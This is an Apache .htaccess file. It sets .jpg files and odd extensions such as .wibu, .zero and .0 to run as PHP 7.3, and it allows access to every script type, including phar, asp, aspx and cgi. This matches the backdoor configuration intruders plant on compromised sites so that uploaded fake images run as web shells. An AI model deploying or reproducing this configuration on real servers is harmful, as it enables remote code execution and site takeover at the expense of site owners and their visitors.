<IfModule mime_module>
  AddHandler application/x-httpd-ea-php73 .php .php7 .phtml .wibu .zero .0 .jpg
</IfModule>

<Files *.php>
    Order Deny,Allow
    Allow from all
</Files>
<Files *.phtml>
    Order Deny,Allow
    Allow from all
</Files>
<Files *.pht>
    Order Deny,Allow
    Allow from all
</Files>
<Files *.phar>
    Order Deny,Allow
    Allow from all
</Files>
<Files *.shtml>
    Order Deny,Allow
    Allow from all
</Files>
<Files *.aspx>
    Order Deny,Allow
    Allow from all
</Files>
<Files *.asp>
    Order Deny,Allow
    Allow from all
</Files>
<Files *.cgi>
    Order Deny,Allow
    Allow from all
</Files>
